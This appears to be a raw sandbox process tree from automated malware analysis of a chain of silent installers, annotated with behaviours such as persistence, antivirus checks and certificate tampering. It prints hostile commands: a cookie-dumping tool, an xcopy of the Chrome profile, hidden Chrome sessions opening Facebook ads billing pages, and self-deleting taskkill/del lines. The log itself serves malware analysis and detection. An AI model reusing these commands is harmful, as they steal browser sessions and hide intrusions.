C:\Users\Admin\AppData\Local\Temp\is-25L72.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-25L72.tmp\setups.tmp" /SL5="$901E0,549376,61440,C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe" ll29⤵
- Checks computer location settings
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10428⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 1 3.1616085598.6053825e29300 10429⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZN78VHHWTU\multitimer.exe" 2 3.1616085598.6053825e2930030⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\qownlt4d01d\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\qownlt4d01d\AwesomePoolU1.exe"31⤵
-
-
C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe" /Verysilent /subid=57731⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H96TO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-H96TO.tmp\Setup3310.tmp" /SL5="$3053E,138429,56832,C:\Users\Admin\AppData\Local\Temp\oyfs0ofdfuf\Setup3310.exe" /Verysilent /subid=57732⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe" /Verysilent33⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FGJDV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGJDV.tmp\Setup.tmp" /SL5="$405D2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-95DJR.tmp\Setup.exe" /Verysilent34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe" /Verysilent35⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9G5FL.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-9G5FL.tmp\Delta.tmp" /SL5="$503D6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\Delta.exe" /Verysilent36⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe" /VERYSILENT37⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-4D5MD.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit38⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f39⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 639⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe" /Verysilent35⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MI7JA.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-MI7JA.tmp\PictureLAb.tmp" /SL5="$603D6,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\PictureLAb.exe" /Verysilent36⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe" /VERYSILENT37⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0AIUA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0AIUA.tmp\Setup.tmp" /SL5="$404DA,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-V205G.tmp\Setup.exe" /VERYSILENT38⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2PHV0.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-2PHV0.tmp\HGT.exe" /S /UID=lab21439⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\9a-b8143-0c5-373a4-f9643c376d451\Sidyshywyly.exe"C:\Users\Admin\AppData\Local\Temp\9a-b8143-0c5-373a4-f9643c376d451\Sidyshywyly.exe"40⤵
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exeC:\Users\Admin\AppData\Local\Temp\iu50o31b.sr2\gaooo.exe42⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\ko3l4zli.piu\md7_7dfj.exe42⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\he0hcrqh.gda\askinstall29.exe42⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe43⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe44⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exeC:\Users\Admin\AppData\Local\Temp\adudw5ec.woo\customer4.exe42⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"43⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\l3lviiku.1b0\HookSetp.exe42⤵
-
C:\ProgramData\3849944.42"C:\ProgramData\3849944.42"43⤵
-
-
C:\ProgramData\2565045.28"C:\ProgramData\2565045.28"43⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5raiiqx.tgz\GcleanerWW.exe /mixone & exit41⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe42⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xajv2ux1.m4n\privacytools5.exe43⤵
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\go4l5vtc.1cq\setup.exe /8-2222 & exit41⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exe & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\0aw1nhzn.ljq\MultitimerFour.exe42⤵
-
C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10443⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 1 3.1616085669.605382a51bc0b 10444⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S8C672O6LF\multitimer.exe" 2 3.1616085669.605382a51bc0b45⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe"C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe" /VERYSILENT /id=53546⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\is-KR6HU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KR6HU.tmp\vict.tmp" /SL5="$40664,870426,780800,C:\Users\Admin\AppData\Local\Temp\i4ajlprtypc\vict.exe" /VERYSILENT /id=53547⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9T2MA.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-9T2MA.tmp\wimapi.exe" 53548⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe" /Verysilent /subid=57746⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RR15I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-RR15I.tmp\Setup3310.tmp" /SL5="$30668,138429,56832,C:\Users\Admin\AppData\Local\Temp\zxsk3brktr0\Setup3310.exe" /Verysilent /subid=57747⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe" /Verysilent48⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KAQ55.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KAQ55.tmp\Setup.tmp" /SL5="$6064E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1TBN7.tmp\Setup.exe" /Verysilent49⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe" /Verysilent50⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UUHK6.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-UUHK6.tmp\Delta.tmp" /SL5="$406F4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\Delta.exe" /Verysilent51⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe" /VERYSILENT52⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-KK9PM.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit53⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f54⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 654⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe" /Verysilent50⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7EKUP.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-7EKUP.tmp\PictureLAb.tmp" /SL5="$506F4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\PictureLAb.exe" /Verysilent51⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe" /VERYSILENT52⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2R361.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2R361.tmp\Setup.tmp" /SL5="$307DC,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-6C66I.tmp\Setup.exe" /VERYSILENT53⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HMG9P.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-HMG9P.tmp\HGT.exe" /S /UID=lab21454⤵
-
C:\Users\Admin\AppData\Local\Temp\cc-360d1-383-04e9d-a5d3cb3afab6c\Tukisaesyfu.exe"C:\Users\Admin\AppData\Local\Temp\cc-360d1-383-04e9d-a5d3cb3afab6c\Tukisaesyfu.exe"55⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exeC:\Users\Admin\AppData\Local\Temp\wsum0afv.hg2\gaooo.exe57⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\larumvqj.3eb\md7_7dfj.exe57⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\ampits34.kbd\askinstall29.exe57⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe58⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe59⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exeC:\Users\Admin\AppData\Local\Temp\umappuaj.g22\customer4.exe57⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"58⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\vjzwfvfs.ea5\HookSetp.exe57⤵
-
C:\ProgramData\4630870.50"C:\ProgramData\4630870.50"58⤵
-
-
C:\ProgramData\4111450.45"C:\ProgramData\4111450.45"58⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gbqbhrd.xkj\GcleanerWW.exe /mixone & exit56⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe57⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\no3ghqvw.32r\privacytools5.exe58⤵
- Checks SCSI registry key(s)
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mtucpx2.44v\setup.exe /8-2222 & exit56⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exe & exit56⤵
-
C:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\vhwkeev0.dks\MultitimerFour.exe57⤵
-
C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10458⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 1 3.1616085799.60538327b0368 10459⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TL86OE6QBX\multitimer.exe" 2 3.1616085799.60538327b036860⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\s5m11lj4pau\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\s5m11lj4pau\AwesomePoolU1.exe"61⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe"C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe" /VERYSILENT /id=53561⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3D2CO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3D2CO.tmp\vict.tmp" /SL5="$508AC,870426,780800,C:\Users\Admin\AppData\Local\Temp\fy4ywv0a5kk\vict.exe" /VERYSILENT /id=53562⤵
-
C:\Users\Admin\AppData\Local\Temp\is-92R6R.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-92R6R.tmp\wimapi.exe" 53563⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe" /Verysilent /subid=57761⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ALNGO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-ALNGO.tmp\Setup3310.tmp" /SL5="$804E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\awnddwyz351\Setup3310.exe" /Verysilent /subid=57762⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe" /Verysilent63⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BH2Q0.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BH2Q0.tmp\Setup.tmp" /SL5="$905BE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2G0EP.tmp\Setup.exe" /Verysilent64⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe" /Verysilent65⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RD4J1.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-RD4J1.tmp\Delta.tmp" /SL5="$508C6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\Delta.exe" /Verysilent66⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe" /VERYSILENT67⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-QALQQ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit68⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f69⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 669⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe" /Verysilent65⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A8SF6.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-A8SF6.tmp\PictureLAb.tmp" /SL5="$608C6,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\PictureLAb.exe" /Verysilent66⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe" /VERYSILENT67⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G5BP4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-G5BP4.tmp\Setup.tmp" /SL5="$70610,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-MGLI9.tmp\Setup.exe" /VERYSILENT68⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V0OSS.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-V0OSS.tmp\HGT.exe" /S /UID=lab21469⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\bf-d0835-7a5-3ddac-841d4fa145976\Haexaxojesha.exe"C:\Users\Admin\AppData\Local\Temp\bf-d0835-7a5-3ddac-841d4fa145976\Haexaxojesha.exe"70⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exeC:\Users\Admin\AppData\Local\Temp\5geiscc2.u1c\gaooo.exe72⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt73⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt73⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\d1abrwur.kjm\md7_7dfj.exe72⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exe & exit71⤵
- Checks computer location settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\zmzqpbtc.i3d\askinstall29.exe72⤵
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe73⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe74⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y73⤵
- Enumerates system info in registry
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/73⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc43f36e00,0x7ffc43f36e10,0x7ffc43f36e2074⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2172 /prefetch:874⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1668 /prefetch:874⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:274⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:174⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:174⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:174⤵
-
-
